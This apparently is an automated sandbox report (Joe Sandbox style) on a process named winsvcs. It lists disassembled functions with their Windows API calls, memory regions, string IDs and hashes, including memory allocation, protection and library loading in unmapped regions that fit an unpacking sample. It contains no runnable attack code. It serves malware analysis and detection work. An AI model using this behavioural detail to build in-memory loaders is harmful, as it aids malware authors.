                                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                                                                                                                                                                                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
                                                                                                                                                                                                                          • API String ID: 2234911746-4190719182
                                                                                                                                                                                                                          • Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 306 40fcc0-40fd91 call 40fe50 CreatePen 309 40fd96-40fdcb 306->309 309->309 310 40fdcd-40fe44 CreateFontIndirectA GetSysColor 309->310
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreatePen.GDI32(00000000), ref: 0040FD85
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0040FE0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create$ColorFontIndirect
                                                                                                                                                                                                                          • String ID: Taho$dD
                                                                                                                                                                                                                          • API String ID: 4251253423-4141250355
                                                                                                                                                                                                                          • Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 311 429b0c-429b2e HeapCreate 312 429b32-429b3b 311->312 313 429b30-429b31 311->313
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00429B21
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                          • Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 314 2313894-23138c3 call 2313424 VirtualProtect
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 023138B7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction ID: 5491c17522c4689755f93e42571c3a18064d56a030dfa7599083be755018c6d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66E07E7590020CAFCF01DF94D94589DBBB5EB08200F008199ED54A6311D6319A20EF51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 317 2313904-231392a call 2313424 LoadLibraryA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0231391E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction ID: ff99536a54c0b4a7f08c48841b9d4bb720aff9f916d6c7cd1290506796b4e0ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89D04274D0420CAF8B14EFA8D54589CFBF5EB08200F1081AAEC04A7311EA31AA50DF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 320 40fc5d-40fc6c InvalidateRect call 423ae8 322 40fc71-40fc89 320->322
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                                                                                          • Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 326 2313854-2313883 call 2313424 VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02313877
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: af8c1d895f375091eb1e72980f4e25f1ff833d804355a69e95d82f31dac8c014
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61E07E7590020CAFCF05DF94D94589DBBB5EB08210F00809AED14A6311D6319A20EF51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 323 2310570-231059f call 23102f0 VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02310593
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2310000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: 7569a63427e2638927db8bc5cff9dfdeb981afaf99680e0f73411b78bc5c956c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE07E7590020CAFCF05DF98D94589DBBB5EB08310F00809AED14A6211D6319A61AF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 332 2313824-2313850 call 2313424 VirtualFree
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02313844
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: 8ea9aa2aa6eab2d2d06a90fa68ba9f89661e3dcf01b074b2ba4ac002b6cda761
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFE00275D0420CEF8F15DF94D94599DBBB5EB18210F108199ED14A7311D6319A60DF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 329 2310540-231056c call 23102f0 VirtualFree
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02310560
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2310000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: f6012de57ab58a48443c115ce07a542be81ad39e92d8acf856a3a9d4f1ef4a75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E00275D4020CEF8B05DF98D94599DBBB5EB18310F108199ED1497311D6319A61DF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 335 2313764-231378d call 2313424 GlobalAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(?,?), ref: 02313781
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2874373387.0000000002313000.00000040.00001000.00020000.00000000.sdmp, Offset: 02313000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2313000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction ID: 7d734a4cda3eb2310a22ea1d69d3e444a86dd6eb0613ef7dd083d897e2fb225b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32E02D79D0420CAF8B55EFA8D54589CFBB5EB08210F1081AAEC58A7311EA31AA64DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 00414162
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00414176
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 004141B0
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 004141B7
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00414206
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00414263
                                                                                                                                                                                                                          • GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
                                                                                                                                                                                                                          • lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0041428D
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 00414297
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143A9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143C4
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0041444B
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0041445D
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00414471
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144B1
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144BC
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004144FD
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004145D1
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 004145E2
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 004146A8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$Variant$Clear$AllocColorGlobalRedraw$CacheClassCurrentDestroyFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
                                                                                                                                                                                                                          • String ID: 4D
                                                                                                                                                                                                                          • API String ID: 1509809736-4064760932
                                                                                                                                                                                                                          • Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00410CAC
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3
                                                                                                                                                                                                                            • Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                            • Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                            • Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D1A
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D37
                                                                                                                                                                                                                          • DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410D71
                                                                                                                                                                                                                          • GlobalHandle.KERNEL32(00000000), ref: 00410D7E
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00410D85
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00410DA3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DAB
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DBA
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 825656904-0
                                                                                                                                                                                                                          • Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2083054645-0
                                                                                                                                                                                                                          • Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0042B561
                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 0042B57B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 876702719-0
                                                                                                                                                                                                                          • Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __CreateFrameInfo.LIBCMT ref: 004290ED
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004290F7
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429105
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429113
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042911E
                                                                                                                                                                                                                          • _CallCatchBlock2.LIBCMT ref: 00429144
                                                                                                                                                                                                                            • Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1602911419-0
                                                                                                                                                                                                                          • Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00410127
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 004100D5
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 0041014F
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 0041018C
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 004101D7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2104318304-0
                                                                                                                                                                                                                          • Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
